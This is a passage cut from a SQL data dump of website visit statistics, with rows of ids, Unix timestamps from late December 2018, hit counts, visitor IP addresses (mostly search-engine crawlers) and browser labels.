,0,'40.77.167.63','other'),(361312,1546118590,1,1,0,0,'54.36.149.104','other'),(361313,1546118735,1,1,0,0,'54.36.149.70','other'),(361314,1546118874,1,1,0,0,'46.229.168.143','other'),(361315,1546119088,1,1,0,0,'54.36.149.8','other'),(361316,1546119161,1,1,0,0,'54.36.148.238','other'),(361317,1546119258,1,1,0,0,'54.36.148.193','other'),(361318,1546119307,1,1,0,0,'46.229.168.139','other'),(361319,1546119524,1,1,0,0,'216.244.66.241','other'),(361320,1546119770,1,1,0,0,'54.36.148.137','other'),(361321,1546119821,1,1,0,0,'66.249.66.155','chrome'),(361322,1546119933,2,2,0,0,'54.36.148.231','other'),(361323,1546120070,1,1,0,0,'207.46.13.49','other'),(361324,1546120166,2,2,0,0,'91.196.178.136','chrome'),(361325,1546120264,3,3,0,0,'178.154.244.11','other'),(361326,1546120412,1,1,0,0,'40.77.167.63','other'),(361327,1546120631,3,3,0,0,'216.244.66.241','other'),(361328,1546120699,1,1,0,0,'54.36.148.199','other'),(361329,1546120786,1,1,0,0,'66.249.66.157','chrome'),(361330,1546120787,1,1,0,0,'66.249.66.154','chrome'),(361331,1546120835,1,1,0,0,'54.36.148.119','other'),(361332,1546120852,1,1,0,0,'141.8.142.103','other'),(361333,1546121270,1,1,0,0,'54.36.149.62','other'),(361334,1546121280,1,1,0,0,'54.36.149.44','other'),(361335,1546121384,1,1,0,0,'54.36.149.50','other'),(361336,1546121732,1,1,0,0,'157.55.39.88','other'),(361337,1546121930,1,1,0,0,'178.154.244.11','other'),(361338,1546121951,1,1,0,0,'95.163.255.151','other'),(361339,1546122159,2,2,0,0,'40.77.167.63','other'),(361340,1546122207,2,2,0,0,'216.244.66.241','other'),(361341,1546122493,1,1,0,0,'46.229.168.139','other'),(361342,1546122538,1,1,0,0,'54.36.148.25','other'),(361343,1546122605,1,1,0,0,'54.36.148.177','other'),(361344,1546122626,1,1,0,0,'54.36.148.90','other'),(361345,1546122684,1,1,0,0,'54.36.148.21','other'),(361346,1546122831,1,1,0,0,'207.46.13.49','other'),(361347,1546122931,1,1,0,0,'66.249.66.156','chrome'),(361349,1546122974,1,1,0,0,'54.36.148.120','other'),(361350,1546123140,1,1,0,0,'54.36.148.134','other'),(361351,1546123205,1,1,0,0,'87.250.224.47','other'),(361352,1546123287,1,1,0,0,'95.163.255.161','other'),(361353,1546123658,3,3,0,0,'216.244.66.241','other'),(361354,1546123698,1,1,0,0,'207.46.13.111','other'),(361355,1546123791,1,1,0,0,'5.45.207.19','other'),(361356,1546123977,1,1,0,0,'95.108.213.4','other'),(361357,1546124133,2,2,0,0,'37.9.113.20','other'),(361358,1546124153,1,1,0,0,'54.36.149.4','other'),(361359,1546124394,1,1,0,0,'40.77.167.63','other'),(361360,1546124732,1,1,0,0,'54.36.148.221','other'),(361361,1546124742,1,1,0,0,'54.36.149.88','other'),(361362,1546124874,1,1,0,0,'54.36.148.155','other'),(361363,1546124972,1,1,0,0,'178.154.171.27','other'),(361364,1546124987,1,1,0,0,'213.180.203.53','other'),(361365,1546125144,1,1,0,0,'54.36.149.22','other'),(361366,1546125258,1,1,0,0,'141.8.142.65','other'),(361367,1546125301,2,2,0,0,'141.8.183.23','other'),(361368,1546125311,1,1,0,0,'141.8.142.81','other'),(361369,1546125538,1,1,0,0,'87.250.224.65','other'),(361370,1546125540,1,1,0,0,'87.250.224.99','other'),(361371,1546125542,3,3,0,0,'178.154.171.24','other'),(361372,1546125555,1,1,0,0,'213.180.203.17','other'),(361373,1546125572,2,2,0,0,'95.108.181.83','other'),(361374,1546125585,1,1,0,0,'213.180.203.61','other'),(361375,1546125626,1,1,0,0,'54.36.148.33','other'),(361376,1546125664,1,1,0,0,'37.9.113.20','other'),(361377,1546125688,1,1,0,0,'141.8.142.144','other'),(361378,1546125756,1,1,0,0,'54.36.148.172','other'),(361379,1546125873,1,1,0,0,'54.36.148.178','other'),(361380,1546125934,1,1,0,0,'141.8.183.22','other'),(361381,1546125975,1,1,0,0,'54.36.148.62','other'),(361382,1546126025,1,1,0,0,'87.250.224.118','other'),(361383,1546126052,1,1,0,0,'5.45.207.79','other'),(361384,1546126217,2,2,0,0,'87.250.224.47','other'),(361385,1546126241,1,1,0,0,'178.154.244.65','other'),(361386,1546126262,1,1,0,0,'141.8.142.191','other'),(361387,1546126584,1,1,0,0,'93.158.166.7','other'),(361388,1546126613,3,3,0,0,'216.244.66.241','other'),(361389,1546126753,1,1,0,0,'54.36.148.142','other'),(361390,1546126834,1,1,0,0,'178.154.200.48','other'),(361391,1546126906,1,1,0,0,'54.36.148.26','other'),(361392,1546126935,1,1,0,0,'95.163.255.190','other'),(361393,1546127119,1,1,0,0,'54.36.148.113','other'),(361394,1546127188,1,1,0,0,'178.154.171.24','other'),(361395,1546127214,1,1,0,0,'54.36.149.13','other'),(361396,1546127558,1,1,0,0,'95.163.255.93','other'),(361397,1546127686,1,1,0,0,'66.249.66.44','chrome'),(361398,1546127862,1,1,0,0,'141.8.183.23','other'),(361399,1546127907,1,1,0,0,'8.29.198.26','other'),(361400,1546127926,1,1,0,0,'66.249.66.155','chrome'),(361401,1546127927,1,1,0,0,'66.249.66.156','chrome'),(361402,1546127951,1,1,0,0,'87.250.224.65','other'),(361403,1546128240,1,1,0,0,'54.36.149.92','other'),(361404,1546128264,1,1,0,0,'54.36.148.139','other'),(361405,1546128331,1,1,0,0,'54.36.149.22','other'),(361406,1546128579,1,1,0,0,'178.255.215.94','other'),(361407,1546128635,1,1,0,0,'54.36.148.43','other'),(361408,1546128747,1,1,0,0,'46.229.168.146','other'),(361409,1546128783,1,1,0,0,'54.36.149.31','other'),(361410,1546128856,1,1,0,0,'95.163.255.184','other'),(361411,1546128886,1,1,0,0,'8.29.198.27','other'),(361412,1546128933,1,1,0,0,'95.163.255.65','other'),(361413,1546128937,1,1,0,0,'95.163.255.68','other'),(361414,1546128981,1,1,0,0,'54.36.149.104','other'),(361415,1546129076,1,1,0,0,'95.163.255.161','other'),(361416,1546129296,1,1,0,0,'54.36.148.35','other'),(361417,1546129341,1,1,0,0,'95.163.255.157','other'),(361418,1546129344,1,1,0,0,'95.163.255.167','other'),(361419,1546129461,1,1,0,0,'54.36.148.221','other'),(361420,1546129540,1,1,0,0,'66.249.66.156','chrome'),(361421,1546129727,2,2,0,0,'216.244.66.241','other'),(361422,1546129729,1,1,0,0,'54.36.149.65','other'),(361423,1546130025,2,2,0,0,'66.249.66.44','chrome'),(361424,1546130100,1,1,0,0,'40.77.167.63','other'),(361425,1546130108,1,1,0,0,'54.36.149.18','other'),(361426,1546130173,1,1,0,0,'178.154.244.65','other'),(361427,1546130291,1,1,0,0,'54.36.148.159','other'),(361428,1546130298,1,1,0,0,'95.108.213.4','other'),(361429,1546130793,1,1,0,0,'141.8.183.22','other'),(361430,1546130893,1,1,0,0,'54.36.148.132','other'),(361431,1546131081,3,3,0,0,'66.249.66.156','chrome'),(361432,1546131145,1,1,0,0,'54.36.148.93','other'),(361433,1546131179,1,1,0,0,'54.36.149.11','other'),(361434,1546131376,1,1,0,0,'176.31.208.193','other'),(361435,1546131635,1,1,0,0,'178.154.244.11','other'),(361436,1546131848,1,1,0,0,'54.36.148.246','other'),(361437,1546131857,1,1,0,0,'46.229.168.145','other'),(361438,1546132143,1,1,0,0,'95.163.255.96','other'),(361439,1546132218,1,1,0,0,'54.36.149.55','other'),(361440,1546132445,1,1,0,0,'46.229.168.153','other'),(361441,1546132482,1,1,0,0,'54.36.148.146','other'),(361442,1546132492,1,1,0,0,'54.36.148.99','other'),(361443,1546132548,1,1,0,0,'54.36.148.26','other'),(361444,1546132593,1,1,0,0,'54.36.148.42','other'),(361445,1546132695,1,1,0,0,'40.77.167.23','other'),(361446,1546132759,1,1,0,0,'54.36.148.109','other'),(361447,1546132895,4,4,0,0,'216.244.66.241','other'),(361448,1546132994,1,1,0,0,'95.108.181.83','other'),(361449,1546133208,1,1,0,0,'213.180.203.53','other'),(361450,1546133213,1,1,0,0,'178.154.244.11','other'),(361451,1546133377,1,1,0,0,'141.8.142.103','other'),(361452,1546133486,1,1,0,0,'54.36.149.14','other'),(361453,1546133565,2,2,0,0,'5.45.207.79','other'),(361454,1546133636,2,2,0,0,'40.77.167.18','other'),(361455,1546133775,1,1,0,0,'54.36.148.101','other'),(361456,1546133934,1,1,0,0,'54.36.149.1','other'),(361457,1546133985,1,1,0,0,'54.36.149.41','other'),(361458,1546134049,1,1,0,0,'216.244.66.241','other'),(361459,1546134165,1,1,0,0,'54.36.148.66','other'),(361460,1546134408,1,1,0,0,'54.36.149.79','other'),(361461,1546134656,1,1,0,0,'54.36.148.142','other'),(361462,1546134672,1,1,0,0,'54.36.148.14','other'),(361463,1546134865,1,1,0,0,'46.229.168.149','other'),(361464,1546134866,1,1,0,0,'95.163.255.175','other'),(361465,1546134868,1,1,0,0,'54.36.148.43','other'),(361466,1546134890,1,1,0,0,'54.36.148.224','other'),(361467,1546135083,1,1,0,0,'95.163.255.158','other'),(361468,1546135086,1,1,0,0,'95.163.255.164','other'),(361469,1546135193,1,1,0,0,'54.36.148.160','other'),(361470,1546135433,1,1,0,0,'54.36.148.242','other'),(361471,1546135540,3,3,0,0,'216.244.66.241','other'),(361472,1546135634,1,1,0,0,'54.36.149.103','other'),(361473,1546135665,1,1,0,0,'66.249.66.57','chrome'),(361474,1546135666,1,1,0,0,'66.249.66.40','chrome'),(361475,1546135820,1,1,0,0,'54.36.148.117','other'),(361476,1546136329,1,1,0,0,'54.36.148.95','other'),(361477,1546136724,1,1,0,0,'54.36.148.224','other'),(361478,1546136910,1,1,0,0,'54.36.148.72','other'),(361479,1546137008,1,1,0,0,'5.188.211.13','msie'),(361480,1546137288,1,1,0,0,'54.36.148.197','other'),(361481,1546137413,2,2,0,0,'40.77.167.63','other'),(361482,1546138177,1,1,0,0,'54.36.149.10','other'),(361483,1546138351,1,1,0,0,'54.36.149.98','other'),(361484,1546138383,6,6,0,0,'216.244.66.241','other'),(361485,1546138414,1,1,0,0,'54.36.149.95','other'),(361486,1546138481,2,2,0,0,'178.154.244.11','other'),(361487,1546138579,2,2,0,0,'5.45.207.79','other'),(361488,1546138626,1,1,0,0,'54.36.148.38','other'),(361489,1546138736,4,4,0,0,'5.45.207.19','other'),(361490,1546138745,1,1,0,0,'8.29.198.26','other'),(361491,1546138806,1,1,0,0,'37.9.113.103','other'),(361492,1546139057,2,2,0,0,'52.12.50.18','chrome'),(361493,1546139422,1,1,0,0,'46.229.168.138','other'),(361494,1546139489,1,1,0,0,'216.244.66.241','other'),(361495,1546139574,1,1,0,0,'178.154.244.11','other'),(361496,1546139714,1,1,0,0,'40.77.167.63','other'),(361497,1546139719,2,2,0,0,'66.249.66.154','chrome'),(361498,1546139724,1,1,0,0,'8.29.198.26','other'),(361499,1546139829,1,1,0,0,'54.36.149.46','other'),(361500,1546139951,1,1,0,0,'54.36.148.170','other'),(361501,1546140076,1,1,0,0,'66.249.66.157','chrome'),(361503,1546140118,1,1,0,0,'54.36.149.71','other'),(361504,1546140143,2,2,0,0,'207.46.13.49','other'),(361505,1546140177,1,1,0,0,'66.249.66.156','chrome'),(361506,1546140203,1,1,0,0,'54.36.148.198','other'),(361507,1546140368,2,2,0,0,'40.77.167.18','other'),(361508,1546140796,1,1,0,0,'54.36.148.54','other'),(361509,1546140803,1,1,0,0,'95.163.255.168','other'),(361510,1546140806,1,1,0,0,'95.163.255.185','other'),(361511,1546140826,1,1,0,0,'54.36.148.67','other'),(361512,1546140856,1,1,0,0,'95.163.255.163','other'),(361513,1546140875,1,1,0,0,'54.36.148.212','other'),(361514,1546141161,1,1,0,0,'54.36.149.70','other'),(361515,1546141176,1,1,0,0,'54.36.148.222','other'),(361516,1546141299,1,1,0,0,'54.36.149.41','other'),(361517,1546141300,4,4,0,0,'216.244.66.241','other'),(361518,1546141391,1,1,0,0,'54.36.148.40','other'),(361519,1546141404,1,1,0,0,'207.46.13.157','other'),(361520,1546141526,1,1,0,0,'54.36.148.87','other'),(361521,1546141766,1,1,0,0,'54.36.148.231','other'),(361522,1546141790,1,1,0,0,'46.229.168.138','other'),(361523,1546141791,1,1,0,0,'46.229.168.144','other'),(361524,1546141891,1,1,0,0,'54.36.148.201','other'),(361525,1546142014,1,1,0,0,'54.36.148.112','other'),(361526,1546142213,1,1,0,0,'54.36.148.227','other'),(361527,1546142423,1,1,0,0,'178.154.171.24','other'),(361528,1546142809,1,1,0,0,'54.36.148.121','other'),(361529,1546142894,1,1,0,0,'66.249.66.156','chrome'),(361530,1546142968,1,1,0,0,'54.36.148.120','other'),(361531,1546143046,1,1,0,0,'87.250.224.47','other'),(361532,1546143173,1,1,0,0,'54.36.149.87','other'),(361533,1546143195,1,1,0,0,'54.36.148.211','other'),(361534,1546143224,1,1,0,0,'54.36.148.209','other'),(361535,1546143343,1,1,0,0,'54.36.148.243','other'),(361536,1546143440,1,1,0,0,'54.36.148.245','other'),(361537,1546143664,2,2,0,0,'91.196.178.136','firefox'),(361538,1546143736,1,1,0,0,'54.36.149.29','other'),(361539,1546143833,1,1,0,0,'178.154.244.11','other'),(361540,1546143990,1,1,0,0,'207.46.13.49','other'),(361541,1546144255,3,3,0,0,'216.244.66.241','other'),(361542,1546144321,1,1,0,0,'54.36.149.86','other'),(361543,1546144495,1,1,0,0,'54.36.148.196','other'),(361544,1546144523,1,1,0,0,'54.36.149.81','other'),(361545,1546144865,1,1,0,0,'95.163.255.185','other'),(361547,1546144868,1,1,0,0,'95.163.255.157','other'),(361548,1546144981,1,1,0,0,'54.36.148.41','other'),(361549,1546145072,1,1,0,0,'46.229.168.129','other'),(361550,1546145075,1,1,0,0,'46.229.168.133','other'),(361551,1546145163,1,1,0,0,'54.36.148.241','other'),(361552,1546145330,2,2,0,0,'95.163.255.168','other'),(361553,1546145611,1,0,1,0,'66.249.66.59',''),(361554,1546145612,1,0,1,0,'66.249.66.42',''),(361555,1546145670,1,1,0,0,'54.36.148.244','other'),(361556,1546146157,1,1,0,0,'95.163.255.196','other'),(361557,1546146246,1,1,0,0,'46.229.168.144','other'),(361558,1546146248,1,1,0,0,'46.229.168.152','other'),(361559,1546146353,1,1,0,0,'54.36.149.59','other'),(361560,1546146472,1,1,0,0,'95.163.255.161','other'),(361561,1546146576,1,1,0,0,'54.36.149.15','other'),(361562,1546146755,1,1,0,0,'54.36.148.30','other'),(361563,1546146971,1,1,0,0,'54.36.149.50','other'),(361564,1546147092,1,1,0,0,'54.36.148.229','other'),(361565,1546147130,9,9,0,0,'216.244.66.241','other'),(361566,1546147342,1,1,0,0,'54.36.149.73','other'),(361567,1546147551,1,1,0,0,'46.229.168.138','other'),(361568,1546147599,1,1,0,0,'66.249.66.40','chrome'),(361569,1546147742,1,1,0,0,'54.36.149.3','other'),(361570,1546147845,1,1,0,0,'54.36.148.122','other'),(361571,1546147917,1,1,0,0,'54.36.149.70','other'),(361572,1546147927,1,1,0,0,'54.36.148.228','other'),(361573,1546148048,1,1,0,0,'54.36.149.11','other'),(361574,1546148075,1,1,0,0,'54.36.149.29','other'),(361575,1546148606,1,1,0,0,'54.36.148.159','other'),(361576,1546148813,1,1,0,0,'178.154.244.11','other'),(361577,1546148850,1,1,0,0,'54.36.148.252','other'),(361578,1546148860,1,1,0,0,'54.36.148.198','other'),(361579,1546148934,1,1,0,0,'54.36.148.130','other'),(361580,1546148988,1,1,0,0,'216.244.66.241','other'),(361581,1546149008,1,1,0,0,'54.36.148.237','other'),(361582,1546149343,1,1,0,0,'54.36.148.160','other'),(361583,1546149584,1,1,0,0,'8.29.198.25','other'),(361584,1546149877,1,1,0,0,'178.154.244.11','other'),(361585,1546149892,2,2,0,0,'163.172.67.180','other'),(361586,1546150024,8,8,0,0,'216.244.66.241','other'),(361587,1546150379,1,1,0,0,'54.36.148.66','other'),(361588,1546150565,1,1,0,0,'8.29.198.25','other'),(361589,1546150643,1,1,0,0,'95.163.255.156','other'),(361590,1546150646,1,1,0,0,'95.163.255.183','other'),(361591,1546150787,1,1,0,0,'95.163.255.151','other'),(361592,1546151086,1,1,0,0,'207.46.13.174','other'),(361593,1546151350,1,1,0,0,'54.36.148.77','other'),(361594,1546151443,2,2,0,0,'91.196.178.39','chrome'),(361595,1546151450,1,1,0,0,'5.45.207.79','other'),(361596,1546151581,2,2,0,0,'95.108.213.4','other'),(361597,1546151648,1,1,0,0,'37.9.113.148','other'),(361598,1546151656,3,3,0,0,'5.45.207.19','other'),(361599,1546151661,2,2,0,0,'178.154.244.11','other'),(361600,1546151693,4,4,0,0,'141.8.142.103','other'),(361601,1546151888,1,1,0,0,'54.36.148.224','other'),(361602,1546152233,1,1,0,0,'87.250.224.47','other'),(361603,1546152312,2,2,0,0,'87.250.224.64','other'),(361604,1546152534,1,1,0,0,'54.36.149.106','other'),(361605,1546152690,2,2,0,0,'5.45.207.79','other'),(361606,1546152743,1,1,0,0,'178.154.244.11','other'),(361607,1546152858,1,1,0,0,'5.45.207.19','other'),(361608,1546153038,1,1,0,0,'95.163.255.183','other'),(361609,1546153078,5,5,0,0,'216.244.66.241','other'),(361610,1546153204,1,1,0,0,'54.36.148.231','other'),(361611,1546153255,1,1,0,0,'54.36.148.52','other'),(361612,1546153310,1,1,0,0,'54.36.148.30','other'),(361613,1546153358,1,1,0,0,'54.36.149.4','other'),(361614,1546153590,1,1,0,0,'87.250.224.64','other'),(361615,1546153599,1,1,0,0,'87.250.224.107','other'),(361616,1546153832,1,1,0,0,'178.154.244.11','other'),(361617,1546154026,1,1,0,0,'46.229.168.145','other'),(361618,1546154190,1,1,0,0,'54.36.148.196','other'),(361619,1546154708,1,1,0,0,'54.36.149.62','other'),(361620,1546154956,1,1,0,0,'54.36.148.185','other'),(361621,1546155592,1,1,0,0,'54.36.148.211','other'),(361622,1546155813,9,9,0,0,'216.244.66.241','other'),(361623,1546156028,1,1,0,0,'54.36.148.54','other'),(361624,1546156066,1,1,0,0,'46.229.168.130','other'),(361625,1546156203,1,1,0,0,'54.36.149.47','other'),(361626,1546156384,1,1,0,0,'54.36.148.139','other'),(361627,1546156582,1,1,0,0,'54.36.148.201','other'),(361628,1546156589,1,1,0,0,'178.154.244.11','other'),(361629,1546156693,1,1,0,0,'54.36.148.197','other'),(361630,1546156811,1,1,0,0,'54.36.149.55','other'),(361631,1546156898,1,1,0,0,'54.36.148.227','other'),(361632,1546157121,1,1,0,0,'95.163.255.195','other'),(361633,1546157124,1,1,0,0,'95.163.255.181','other'),(361634,1546157241,1,1,0,0,'54.36.149.44','other'),(361635,1546157316,2,2,0,0,'216.244.66.241','other'),(361636,1546157592,1,1,0,0,'54.36.148.54','other'),(361637,1546157603,1,1,0,0,'95.163.255.175','other'),(361638,1546157605,1,1,0,0,'95.163.255.179','other'),(361639,1546157733,1,1,0,0,'54.36.148.224','other'),(361640,1546157791,1,1,0,0,'54.36.148.169','other'),(361641,1546157889,1,1,0,0,'54.36.148.242','other'),(361642,1546158176,1,1,0,0,'95.163.255.157','other'),(361643,1546158203,1,1,0,0,'54.36.148.26','other'),(361644,1546158223,1,1,0,0,'54.36.148.111','other'),(361645,1546158729,5,5,0,0,'216.244.66.241','other'),(361646,1546159128,1,1,0,0,'54.36.148.77','other'),(361647,1546159352,1,1,0,0,'54.36.148.79','other'),(361648,1546159639,1,1,0,0,'54.36.148.231','other'),(361649,1546160189,1,1,0,0,'54.36.148.45','other'),(361650,1546160200,1,1,0,0,'54.36.149.64','other'),(361651,1546160356,2,2,0,0,'91.196.178.67','firefox'),(361652,1546160422,1,1,0,0,'8.29.198.27','other'),(361653,1546160545,1,1,0,0,'54.36.148.92','other'),(361654,1546160555,1,1,0,0,'54.36.149.4','other'),(361655,1546160576,1,1,0,0,'54.36.148.253','other'),(361656,1546160668,1,1,0,0,'54.36.148.126','other'),(361657,1546160781,1,1,0,0,'216.244.66.241','other'),(361658,1546160901,1,1,0,0,'95.163.255.94','other'),(361659,1546161065,1,1,0,0,'54.36.148.103','other'),(361660,1546161073,3,3,0,0,'66.249.66.156','chrome'),(361661,1546161093,1,1,0,0,'66.249.66.154','chrome'),(361662,1546161172,1,1,0,0,'54.36.148.130','other'),(361663,1546161262,1,1,0,0,'54.36.149.25','other'),(361664,1546161388,1,1,0,0,'54.36.148.222','other'),(361665,1546161397,1,1,0,0,'8.29.198.27','other'),(361666,1546161423,1,1,0,0,'54.36.148.208','other'),(361667,1546161623,1,1,0,0,'54.36.148.198','other'),(361668,1546161830,1,1,0,0,'54.36.148.159','other'),(361669,1546161870,1,1,0,0,'54.36.148.174','other'),(361670,1546161880,1,1,0,0,'54.36.148.143','other'),(361671,1546161981,2,2,0,0,'216.244.66.241','other'),(361672,1546162253,1,1,0,0,'54.36.148.245','other'),(361673,1546162433,1,1,0,0,'54.36.148.14','other'),(361674,1546162482,1,1,0,0,'54.36.148.43','other'),(361675,1546162493,1,1,0,0,'54.36.149.89','other'),(361676,1546162775,1,1,0,0,'54.36.149.95','other'),(361677,1546162840,1,1,0,0,'54.36.148.34','other'),(361678,1546162905,1,1,0,0,'46.229.168.153','other'),(361679,1546163011,1,1,0,0,'95.163.255.155','other'),(361680,1546163046,7,7,0,0,'144.76.29.149','other'),(361681,1546163073,1,1,0,0,'40.77.167.132','other'),(361682,1546163165,1,1,0,0,'54.36.149.58','other'),(361683,1546163254,1,1,0,0,'54.36.148.206','other'),(361684,1546163287,2,2,0,0,'141.8.142.103','other'),(361685,1546163324,2,2,0,0,'37.9.113.148','other'),(361686,1546163375,32,32,0,0,'79.211.71.14','other'),(361687,1546163386,3,3,0,0,'37.9.113.103','other'),(361688,1546163442,1,1,0,0,'87.250.224.65','other'),(361689,1546163460,2,2,0,0,'5.45.207.19','other'),(361690,1546163475,4,4,0,0,'5.45.207.79','other'),(361691,1546163500,1,1,0,0,'46.229.168.130','other'),(361692,1546163897,1,1,0,0,'178.154.244.65','other'),(361693,1546163923,1,1,0,0,'87.250.224.47','other'),(361694,1546163938,1,1,0,0,'46.229.168.138','other'),(361695,1546163972,1,1,0,0,'54.36.148.67','other'),(361696,1546163987,1,1,0,0,'95.108.213.4','other'),(361697,1546163991,1,1,0,0,'46.229.168.136','other'),(361698,1546164121,4,4,0,0,'91.196.178.78','chrome'),(361699,1546164297,1,1,0,0,'54.36.149.68','other'),(361700,1546164317,1,1,0,0,'54.36.148.120','other'),(361701,1546164557,6,6,0,0,'216.244.66.241','other'),(361702,1546164913,1,1,0,0,'141.8.142.103','other'),(361704,1546165023,1,1,0,0,'54.36.148.38','other'),(361705,1546165095,2,2,0,0,'46.229.168.147','other'),(361706,1546165211,1,1,0,0,'66.249.66.57','chrome'),(361707,1546165215,1,1,0,0,'66.249.66.40','chrome'),(361708,1546165363,1,1,0,0,'54.36.148.80','other'),(361709,1546165401,1,1,0,0,'85.192.162.173','msie'),(361710,1546165551,1,1,0,0,'46.229.168.132','other'),(361711,1546165583,1,1,0,0,'54.36.148.78','other'),(361712,1546166014,1,1,0,0,'54.36.148.229','other'),(361713,1546166078,1,1,0,0,'54.36.148.87','other'),(361714,1546166158,1,1,0,0,'54.36.148.60','other'),(361715,1546166290,1,1,0,0,'54.36.148.254','other'),(361716,1546166387,1,1,0,0,'95.163.255.156','other'),(361717,1546166390,1,1,0,0,'95.163.255.196','other'),(361718,1546166411,1,1,0,0,'216.244.66.241','other'),(361719,1546166525,2,2,0,0,'54.36.148.202','other'),(361720,1546166802,2,2,0,0,'54.36.148.181','other'),(361721,1546166897,1,1,0,0,'54.36.148.12','other'),(361722,1546166900,1,1,0,0,'95.163.255.195','other'),(361723,1546166902,1,1,0,0,'95.163.255.177','other'),(361724,1546167346,1,1,0,0,'54.36.149.65','other'),(361725,1546167458,4,4,0,0,'216.244.66.241','other'),(361726,1546167838,1,1,0,0,'54.36.149.60','other'),(361727,1546167878,2,2,0,0,'54.36.149.96','other'),(361728,1546168556,1,1,0,0,'54.36.148.209','other'),(361729,1546168878,1,1,0,0,'54.36.148.135','other'),(361730,1546169335,2,2,0,0,'216.244.66.241','other'),(361731,1546169359,3,3,0,0,'40.77.167.76','other'),(361732,1546169601,1,1,0,0,'85.192.162.173','msie'),(361733,1546170423,4,4,0,0,'216.244.66.241','other'),(361734,1546170529,1,1,0,0,'54.36.148.198','other'),(361735,1546170783,1,1,0,0,'157.55.39.239','other'),(361736,1546171190,2,2,0,0,'95.163.255.105','other'),(361737,1546171241,1,1,0,0,'95.163.255.117','other'),(361738,1546171258,1,1,0,0,'40.77.167.132','other'),(361739,1546171262,1,1,0,0,'8.29.198.27','other'),(361740,1546171336,1,1,0,0,'95.163.255.112','other'),(361741,1546171458,1,1,0,0,'95.163.255.119','other'),(361742,1546171655,1,1,0,0,'54.36.148.144','other'),(361743,1546171814,1,1,0,0,'40.77.167.76','other'),(361744,1546171833,1,1,0,0,'66.249.66.44','chrome'),(361745,1546172001,1,1,0,0,'157.55.39.239','other'),(361746,1546172083,1,1,0,0,'95.163.255.103','other'),(361747,1546172229,1,1,0,0,'8.29.198.27','other'),(361748,1546172298,2,2,0,0,'46.211.120.23','chrome'),(361749,1546172655,1,1,0,0,'5.45.207.19','other'),(361750,1546172751,1,1,0,0,'54.36.148.68','other'),(361751,1546172788,1,1,0,0,'54.36.148.156','other'),(361752,1546172931,1,1,0,0,'54.36.148.18','other'),(361753,1546172961,1,1,0,0,'54.36.149.105','other'),(361754,1546172999,1,1,0,0,'95.163.255.104','other'),(361755,1546173017,1,1,0,0,'95.163.255.108','other'),(361756,1546173395,8,8,0,0,'216.244.66.241','other'),(361757,1546173556,1,1,0,0,'54.36.149.19','other'),(361758,1546173732,1,1,0,0,'178.154.244.11','other'),(361759,1546173814,1,1,0,0,'54.36.148.28','other'),(361760,1546174378,1,1,0,0,'95.163.255.115','other'),(361761,1546174390,1,1,0,0,'95.163.255.103','other'),(361762,1546174739,1,1,0,0,'54.36.148.71','other'),(361763,1546174923,1,1,0,0,'54.36.149.51','other'),(361764,1546175179,1,1,0,0,'54.36.149.70','other'),(361765,1546175258,1,1,0,0,'54.36.148.231','other'),(361766,1546175406,1,1,0,0,'54.36.149.71','other'),(361767,1546175448,1,1,0,0,'54.36.149.11','other'),(361768,1546175529,1,1,0,0,'66.249.66.152','chrome'),(361769,1546175538,1,1,0,0,'54.36.148.212','other'),(361770,1546175593,1,1,0,0,'54.36.149.58','other'),(361771,1546175813,1,1,0,0,'5.45.207.79','other'),(361772,1546176014,1,1,0,0,'54.36.148.59','other'),(361773,1546176140,11,11,0,0,'216.244.66.241','other'),(361774,1546176619,1,1,0,0,'54.36.148.232','other'),(361775,1546176713,1,1,0,0,'54.36.148.52','other'),(361776,1546176749,1,1,0,0,'46.229.168.146','other'),(361777,1546176764,1,1,0,0,'54.36.148.35','other'),(361778,1546177049,1,1,0,0,'54.36.149.8','other'),(361779,1546177061,1,1,0,0,'54.36.148.241','other'),(361780,1546177244,1,1,0,0,'46.229.168.130','other'),(361781,1546177305,1,1,0,0,'66.249.66.154','chrome'),(361782,1546177562,1,1,0,0,'95.163.255.162','other'),(361783,1546177565,1,1,0,0,'95.163.255.171','other'),(361784,1546177792,1,1,0,0,'54.36.148.32','other'),(361785,1546177822,1,1,0,0,'66.249.66.57','chrome'),(361787,1546177966,1,1,0,0,'178.154.244.11','other'),(361788,1546178019,1,1,0,0,'54.36.148.139','other'),(361789,1546178068,1,1,0,0,'95.163.255.113','other'),(361790,1546178144,3,3,0,0,'216.244.66.241','other'),(361791,1546178250,1,1,0,0,'54.36.148.125','other'),(361792,1546178251,1,1,0,0,'95.163.255.106','other'),(361793,1546178260,1,1,0,0,'54.36.148.154','other'),(361794,1546178430,1,1,0,0,'95.163.255.118','other'),(361795,1546178461,1,1,0,0,'54.36.148.155','other'),(361796,1546178581,1,1,0,0,'95.163.255.109','other'),(361797,1546178630,1,1,0,0,'66.249.66.42','chrome'),(361798,1546178741,1,1,0,0,'95.163.255.112','other'),(361799,1546178808,1,1,0,0,'54.36.149.23','other'),(361800,1546178907,1,1,0,0,'46.229.168.143','other'),(361801,1546178908,1,1,0,0,'46.229.168.130','other'),(361802,1546178947,1,1,0,0,'46.229.168.154','other'),(361803,1546178949,2,2,0,0,'46.229.168.140','other'),(361804,1546178978,1,1,0,0,'54.36.148.42','other'),(361805,1546179006,2,2,0,0,'95.163.255.108','other'),(361806,1546179064,4,4,0,0,'216.244.66.241','other'),(361807,1546179197,1,1,0,0,'40.77.167.181','other'),(361808,1546179347,1,1,0,0,'95.163.255.102','other'),(361809,1546179371,1,1,0,0,'54.36.149.43','other'),(361810,1546179530,1,1,0,0,'54.36.149.3','other'),(361811,1546179603,2,2,0,0,'95.163.255.113','other'),(361812,1546179677,1,1,0,0,'95.163.255.107','other'),(361813,1546179720,3,3,0,0,'95.163.255.114','other'),(361814,1546179793,1,1,0,0,'95.163.255.104','other'),(361815,1546179825,1,1,0,0,'95.163.255.112','other'),(361816,1546179912,1,1,0,0,'54.36.148.61','other'),(361817,1546180417,1,1,0,0,'54.36.149.72','other'),(361818,1546180446,1,1,0,0,'31.184.238.107','chrome'),(361819,1546180516,1,1,0,0,'46.229.168.153','other'),(361820,1546180558,1,1,0,0,'216.244.66.241','other'),(361821,1546180640,1,1,0,0,'54.36.148.15','other'),(361822,1546180710,1,1,0,0,'54.36.148.247','other'),(361823,1546180743,1,1,0,0,'178.154.244.11','other'),(361824,1546181111,1,1,0,0,'54.36.148.102','other'),(361825,1546181182,1,1,0,0,'54.36.148.122','other'),(361826,1546181202,1,1,0,0,'54.36.148.241','other'),(361827,1546181266,1,1,0,0,'207.46.13.244','other'),(361828,1546181391,1,1,0,0,'54.36.148.70','other'),(361829,1546181563,1,1,0,0,'54.36.148.155','other'),(361830,1546181709,1,1,0,0,'40.77.167.87','other'),(361831,1546181713,2